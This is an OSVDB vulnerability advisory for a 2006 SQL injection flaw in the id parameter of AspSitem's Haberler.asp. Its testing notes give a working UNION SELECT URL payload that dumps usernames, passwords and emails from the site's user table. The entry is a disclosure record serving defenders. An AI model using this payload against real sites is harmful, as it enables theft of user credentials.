AspSitem Haberler.asp id Variable SQL Injection

2006-04-19T05:17:38
ID OSVDB:24765
Type osvdb
Reporter OSVDB
Modified 2006-04-19T05:17:38

Description

Manual Testing Notes

http://[target]/[ASPSitemDir]/Haberler.asp?haber=devam&id=-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%201

References:

Vendor URL: http://www.aspsitem.com/ Secunia Advisory ID:19693 Other Advisory URL: http://www.nukedx.com/?viewdoc=23 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0501.html FrSIRT Advisory: ADV-2006-1439 CVE-2006-1964 Bugtraq ID: 17616